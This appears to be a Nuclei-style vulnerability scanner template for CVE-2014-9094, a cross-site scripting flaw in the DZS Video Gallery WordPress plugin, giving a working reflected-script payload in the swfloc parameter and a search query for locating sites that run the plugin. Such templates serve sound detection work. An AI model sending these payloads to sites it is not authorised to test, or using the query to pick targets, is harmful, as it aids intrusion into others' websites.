51 lines
1.8 KiB
YAML
51 lines
1.8 KiB
YAML
id: CVE-2014-9094
|
|
|
|
info:
|
|
name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.
|
|
remediation: |
|
|
Update to the latest version of the WordPress DZS-VideoGallery Plugin, which includes a fix for this vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-9094
|
|
- http://websecurity.com.ua/7152/
|
|
- http://seclists.org/fulldisclosure/2014/Jul/65
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2014-9094
|
|
cwe-id: CWE-79
|
|
epss-score: 0.83554
|
|
epss-percentile: 0.98095
|
|
cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: digitalzoomstudio
|
|
product: video_gallery
|
|
framework: wordpress
|
|
google-query: inurl:"/wp-content/plugins/dzs-videogallery"
|
|
tags: cve2014,wordpress,xss,wp-plugin,seclists,cve
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<script>alert(1)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100f32d7b67834a6bfadaa455dfef54c452cc3710e3e61643aa4274031ca637b557022031f1646a267c8d55d9af26e1cc7e43f69a6755370a178914e7c4f0173951f6fa:922c64590222798bb761d5b6d8e72950
|